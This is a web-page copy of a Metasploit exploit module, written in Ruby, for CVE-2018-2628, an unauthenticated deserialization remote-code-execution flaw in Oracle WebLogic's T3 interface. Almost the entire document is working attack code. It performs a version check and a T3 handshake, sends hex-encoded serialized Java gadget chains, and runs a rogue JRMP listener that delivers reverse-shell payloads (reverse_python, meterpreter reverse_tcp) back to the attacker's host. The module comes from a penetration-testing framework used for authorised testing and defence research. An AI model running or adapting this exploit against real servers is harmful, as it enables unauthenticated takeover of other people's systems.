Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/misc/weblogic_deserialize.rb
19592 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ManualRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::TcpServer

11
  include Msf::Exploit::Powershell

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'Oracle Weblogic Server Deserialization RCE',

18
        'Description' => %q{

19
          An unauthenticated attacker with network access to the Oracle Weblogic

20
          Server T3 interface can send a serialized object to the interface to

21
          execute code on vulnerable hosts.

22
        },

23
        'Author' => [

24
          'brianwrf', # EDB PoC

25
          'Jacob Robles' # Metasploit Module

26
        ],

27
        'License' => MSF_LICENSE,

28
        'References' => [

29
          ['CVE', '2018-2628'],

30
          ['EDB', '44553']

31
        ],

32
        'Privileged' => false,

33
        'Targets' => [

34
          [

35
            'Unix',

36
            'Platform' => 'unix',

37
            'Arch' => ARCH_CMD,

38
            'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_python' },

39
            'Payload' => {

40
              'Encoder' => 'cmd/ifs',

41
              'BadChars' => ' ',

42
              'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'python' }

43
            }

44
          ],

45
          [

46
            'Windows',

47
            'Platform' => 'win',

48
            'Payload' => {},

49
            'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }

50
          ]

51
        ],

52
        'DefaultTarget' => 0,

53
        'DefaultOptions' => {

54
          'RPORT' => 7001

55
        },

56
        'DisclosureDate' => '2018-04-17',

57
        'Notes' => {

58
          'Reliability' => UNKNOWN_RELIABILITY,

59
          'Stability' => UNKNOWN_STABILITY,

60
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

61
        }

62
      )

63
    )

64
  end

65


66
  def check

67
    connect

68
    req = "GET /console/login/LoginForm.jsp HTTP/1.1\n"

69
    req << "Host: #{peer}\n\n"

70
    sock.put(req)

71


72
    res = sock.get_once

73
    disconnect

74
    return CheckCode::Unknown unless res

75


76
    /WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.*\d*)/ =~ res

77
    if version

78
      version = Rex::Version.new(version)

79
      vprint_good("Detected Oracle WebLogic Server Version: #{version.to_s}")

80


81
      case

82
      when version.to_s.start_with?('10.3')

83
        return CheckCode::Appears unless version > Rex::Version.new('10.3.6.0')

84
      when version.to_s.start_with?('12.1')

85
        return CheckCode::Appears unless version > Rex::Version.new('12.1.3.0')

86
      when version.to_s.start_with?('12.2')

87
        return CheckCode::Appears unless version > Rex::Version.new('12.2.1.3')

88
      end

89
    end

90


91
    if res.include?('Oracle WebLogic Server Administration Console')

92
      return CheckCode::Detected

93
    end

94


95
    CheckCode::Unknown

96
  end

97


98
  def gen_resp

99
    if target.name == 'Windows'

100
      pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true })

101
      tmp_dat = pwrshl.each_byte.map { |b| b.to_s(16) }.join

102
    else

103
      nix_cmd = payload.encoded

104
      nix_cmd.prepend('/bin/sh -c ')

105
      tmp_dat = nix_cmd.each_byte.map { |b| b.to_s(16) }.join

106
    end

107


108
    mycmd = (tmp_dat.length >> 1).to_s(16).rjust(4, '0')

109
    mycmd << tmp_dat

110


111
    # Response data taken from JRMPListener generated data:

112
    # java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener <lport> CommonsCollections1 'calc.exe'

113
    # Modified captured network traffic bytes. Patch in command to run

114
    @resp = '51aced0005770f02086f5ef3000001651a67984d80017372002e6a617661782e'

115
    @resp << '6d616e6167656d656e742e42616441747472696275746556616c756545787045'

116
    @resp << '7863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176'

117
    @resp << '612f6c616e672f4f626a6563743b70787200136a6176612e6c616e672e457863'

118
    @resp << '657074696f6ed0fd1f3e1a3b1cc402000070787200136a6176612e6c616e672e'

119
    @resp << '5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c'

120
    @resp << '6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573'

121
    @resp << '736167657400124c6a6176612f6c616e672f537472696e673b5b000a73746163'

122
    @resp << '6b547261636574001e5b4c6a6176612f6c616e672f537461636b547261636545'

123
    @resp << '6c656d656e743b4c001473757070726573736564457863657074696f6e737400'

124
    @resp << '104c6a6176612f7574696c2f4c6973743b70787071007e0008707572001e5b4c'

125
    @resp << '6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c'

126
    @resp << '3cfd2239020000707870000000047372001b6a6176612e6c616e672e53746163'

127
    @resp << '6b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e'

128
    @resp << '756d6265724c000e6465636c6172696e67436c61737371007e00054c00086669'

129
    @resp << '6c654e616d6571007e00054c000a6d6574686f644e616d6571007e0005707870'

130
    @resp << '0000011b74001e79736f73657269616c2e6578706c6f69742e4a524d504c6973'

131
    @resp << '74656e65727400114a524d504c697374656e65722e6a617661740006646f4361'

132
    @resp << '6c6c7371007e000b000000e071007e000d71007e000e740009646f4d65737361'

133
    @resp << '67657371007e000b000000ab71007e000d71007e000e74000372756e7371007e'

134
    @resp << '000b0000007771007e000d71007e000e7400046d61696e737200266a6176612e'

135
    @resp << '7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c6973'

136
    @resp << '74fc0f2531b5ec8e100200014c00046c69737471007e0007707872002c6a6176'

137
    @resp << '612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c6543'

138
    @resp << '6f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a617661'

139
    @resp << '2f7574696c2f436f6c6c656374696f6e3b707870737200136a6176612e757469'

140
    @resp << '6c2e41727261794c6973747881d21d99c7619d03000149000473697a65707870'

141
    @resp << '000000007704000000007871007e001b787372003273756e2e7265666c656374'

142
    @resp << '2e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e'

143
    @resp << '48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c7565'

144
    @resp << '7374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a61'

145
    @resp << '76612f6c616e672f436c6173733b707870737d00000001000d6a6176612e7574'

146
    @resp << '696c2e4d617074001066696c653a2f746d702f73732e6a6172787200176a6176'

147
    @resp << '612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c'

148
    @resp << '0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174'

149
    @resp << '696f6e48616e646c65723b7078707371007e001c7372002a6f72672e61706163'

150
    @resp << '68652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d'

151
    @resp << '61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f61'

152
    @resp << '70616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e7366'

153
    @resp << '6f726d65723b74001066696c653a2f746d702f73732e6a617278707372003a6f'

154
    @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6675'

155
    @resp << '6e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97'

156
    @resp << '040200015b000d695472616e73666f726d65727374002d5b4c6f72672f617061'

157
    @resp << '6368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72'

158
    @resp << '6d65723b74001066696c653a2f746d702f73732e6a617278707572002d5b4c6f'

159
    @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472'

160
    @resp << '616e73666f726d65723bbd562af1d834189902000074001066696c653a2f746d'

161
    @resp << '702f73732e6a61727870000000057372003b6f72672e6170616368652e636f6d'

162
    @resp << '6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e737461'

163
    @resp << '6e745472616e73666f726d6572587690114102b1940200014c000969436f6e73'

164
    @resp << '74616e7471007e000174001066696c653a2f746d702f73732e6a617278707672'

165
    @resp << '00116a6176612e6c616e672e52756e74696d6500000000000000000000007078'

166
    @resp << '707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c65637469'

167
    @resp << '6f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287'

168
    @resp << 'e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e67'

169
    @resp << '2f4f626a6563743b4c000b694d6574686f644e616d6571007e00055b000b6950'

170
    @resp << '6172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7400'

171
    @resp << '1066696c653a2f746d702f73732e6a61727870757200135b4c6a6176612e6c61'

172
    @resp << '6e672e4f626a6563743b90ce589f1073296c0200007078700000000274000a67'

173
    @resp << '657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab'

174
    @resp << '16d7aecbcd5a99020000707870000000007400096765744d6574686f64757100'

175
    @resp << '7e003e00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a'

176
    @resp << '3bb3420200007078707671007e003e7371007e00367571007e003b0000000270'

177
    @resp << '7571007e003b00000000740006696e766f6b657571007e003e00000002767200'

178
    @resp << '106a6176612e6c616e672e4f626a656374000000000000000000000070787076'

179
    @resp << '71007e003b7371007e0036757200135b4c6a6176612e6c616e672e537472696e'

180
    @resp << '673badd256e7e91d7b470200007078700000000174'

181


182
    @resp << mycmd

183


184
    @resp << '74'

185
    @resp << '0004657865637571007e003e0000000171007e00437371007e0031737200116a'

186
    @resp << '6176612e6c616e672e496e746567657212e2a0a4f78187380200014900057661'

187
    @resp << '6c756570787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b'

188
    @resp << '02000070787000000001737200116a6176612e7574696c2e486173684d617005'

189
    @resp << '07dac1c31660d103000246000a6c6f6164466163746f72490009746872657368'

190
    @resp << '6f6c647078703f40000000000000770800000010000000007878767200126a61'

191
    @resp << '76612e6c616e672e4f7665727269646500000000000000000000007078707100'

192
    @resp << '7e005a'

193
  end

194


195
  def on_client_connect(client)

196
    # Make sure to only sent one meterpreter payload to a host.

197
    # During testing the remote host called back up to 11 times

198
    # (or as long as the server was listening).

199
    vprint_status("Comparing host: #{client.peerhost}")

200
    if @met_sent.include?(client.peerhost) then return end

201


202
    @met_sent << client.peerhost

203


204
    vprint_status("Sending payload to client: #{client.peerhost}")

205


206
    # Response format determined by watching network traffic

207
    # generated by EDB PoC

208
    accept_conn = '4e00'

209
    raccept_conn = client.peerhost.each_byte.map { |b| b.to_s(16) }.join

210
    accept_conn << (raccept_conn.length >> 1).to_s(16).rjust(2, '0')

211
    accept_conn << raccept_conn

212
    accept_conn << '0000'

213
    accept_conn << client.peerport.to_s(16).rjust(4, '0')

214


215
    client.put([accept_conn].pack('H*'))

216
    client.put([@resp].pack('H*'))

217
  end

218


219
  def t3_handshake

220
    shake = '74332031322e322e310a41533a323535'

221
    shake << '0a484c3a31390a4d533a313030303030'

222
    shake << '30300a0a'

223


224
    sock.put([shake].pack('H*'))

225
    sleep(1)

226
    sock.get_once

227
  end

228


229
  def build_t3_request_object

230
    # data block is from EDB PoC

231
    data = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a'

232
    data << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278'

233
    data << '700000000a000000030000000000000006007070707070700000000a00000003'

234
    data << '0000000000000006007006fe010000aced00057372001d7765626c6f6769632e'

235
    data << '726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078'

236
    data << '707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e506163'

237
    data << '6b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d69'

238
    data << '6e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b'

239
    data << '5a000e74656d706f7261727950617463684c0009696d706c5469746c65740012'

240
    data << '4c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271'

241
    data << '007e00034c000b696d706c56657273696f6e71007e000378707702000078fe01'

242
    data << '0000aced00057372001d7765626c6f6769632e726a766d2e436c617373546162'

243
    data << '6c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e'

244
    data << '636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f9722455164'

245
    data << '52463e0200035b00087061636b616765737400275b4c7765626c6f6769632f63'

246
    data << '6f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e7265'

247
    data << '6c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e67'

248
    data << '3b5b001276657273696f6e496e666f417342797465737400025b427872002477'

249
    data << '65626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b61676549'

250
    data << '6e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f724900'

251
    data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'

252
    data << '6d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a'

253
    data << '696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e'

254
    data << '000478707702000078fe010000aced00057372001d7765626c6f6769632e726a'

255
    data << '766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c0000787072'

256
    data << '00217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5065657249'

257
    data << '6e666f585474f39bc908f10200064900056d616a6f724900056d696e6f724900'

258
    data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'

259
    data << '6d706f7261727950617463685b00087061636b616765737400275b4c7765626c'

260
    data << '6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f'

261
    data << '3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5665'

262
    data << '7273696f6e496e666f972245516452463e0200035b00087061636b6167657371'

263
    data << '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c61'

264
    data << '6e672f537472696e673b5b001276657273696f6e496e666f4173427974657374'

265
    data << '00025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c'

266
    data << '2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f7249'

267
    data << '00056d696e6f7249000c726f6c6c696e67506174636849000b73657276696365'

268
    data << '5061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c'

269
    data << '6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56'

270
    data << '657273696f6e71007e000578707702000078fe00fffe010000aced0005737200'

271
    data << '137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078'

272
    data << '707750210000000000000000000d3139322e3136382e312e323237001257494e'

273
    data << '2d4147444d565155423154362e656883348cd6000000070000'

274


275
    data << rport.to_s(16).rjust(4, '0')

276


277
    data << 'ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced00'

278
    data << '05737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a'

279
    data << '0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461'

280
    data << '863d1d0000000078'

281


282
    sock.put([data].pack('H*'))

283
    sleep(2)

284
    sock.get_once

285
  end

286


287
  def send_payload_objdata

288
    # JRMPClient2 payload generated from EDB PoC:

289
    # python exploit.py <rhost> <rport> ysoserial-0.0.6-SNAPSHOT-BETA-all.jar <lhost> <lport> JRMPClient2

290
    # Patch in srvhost and srvport

291
    payload = '056508000000010000001b0000005d0101007372017870737202787000000000'

292
    payload << '00000000757203787000000000787400087765626c6f67696375720478700000'

293
    payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced'

294
    payload << '00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e'

295
    payload << '7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e0020000'

296
    payload << '78707702000078fe010000aced00057372001d7765626c6f6769632e726a766d'

297
    payload << '2e436c6173735461626c65456e7472792f52658157f4f9ed0c00007870720013'

298
    payload << '5b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870'

299
    payload << '7702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e43'

300
    payload << '6c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a61'

301
    payload << '76612e7574696c2e566563746f72d9977d5b803baf0103000349001163617061'

302
    payload << '63697479496e6372656d656e7449000c656c656d656e74436f756e745b000b65'

303
    payload << '6c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b'

304
    payload << '78707702000078fe010000'

305


306
    # Data

307
    payload << 'aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e'

308
    payload << '416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50'

309
    payload << '726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e67'

310
    payload << '2f7265666c6563742f496e766f636174696f6e48616e646c65723b7870737200'

311
    payload << '2d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e76'

312
    payload << '6f636174696f6e48616e646c657200000000000000020200007872001c6a6176'

313
    payload << '612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c6133'

314
    payload << '1e030000787077'

315


316
    unicast_srvhost = srvhost.each_byte.map { |b| b.to_s(16) }.join

317
    unicast_dat = '000a556e696361737452656600'

318
    unicast_dat << (unicast_srvhost.length >> 1).to_s(16).rjust(2, '0')

319
    unicast_dat << unicast_srvhost

320
    unicast_dat << '0000'

321
    unicast_dat << srvport.to_s(16).rjust(4, '0')

322
    unicast_dat << '000000004e18654b000000000000000000000000000000'

323
    unicast_dat << '78'

324


325
    payload << ((unicast_dat.length >> 1) - 1).to_s(16).rjust(2, '0')

326
    payload << unicast_dat

327


328
    payload << 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461'

329
    payload << '626c6553657276696365436f6e74657874ddcba8706386f0ba0c000078720029'

330
    payload << '7765626c6f6769632e726d692e70726f76696465722e42617369635365727669'

331
    payload << '6365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765'

332
    payload << '626c6f6769632e726d692e696e7465726e616c2e4d6574686f64446573637269'

333
    payload << '70746f7212485a828af7f67b0c000078707734002e61757468656e7469636174'

334
    payload << '65284c7765626c6f6769632e73656375726974792e61636c2e55736572496e66'

335
    payload << '6f3b290000001b7878fe00ff'

336


337
    data = ((payload.length >> 1) + 4).to_s(16).rjust(8, '0')

338
    data << payload

339


340
    sock.put([data].pack('H*'))

341
    sleep(1)

342
    sock.put([data].pack('H*'))

343
    sleep(1)

344
    sock.get_once

345
  end

346


347
  def exploit

348
    @met_sent = []

349
    gen_resp

350


351
    connect

352
    vprint_status('Sending handshake...')

353
    t3_handshake

354


355
    build_t3_request_object

356


357
    start_service

358


359
    print_status('Sending client object payload...')

360
    send_payload_objdata

361


362
    # Need to wait this long to make sure we get a shell back

363
    sleep(10)

364
  end

365
end

366


367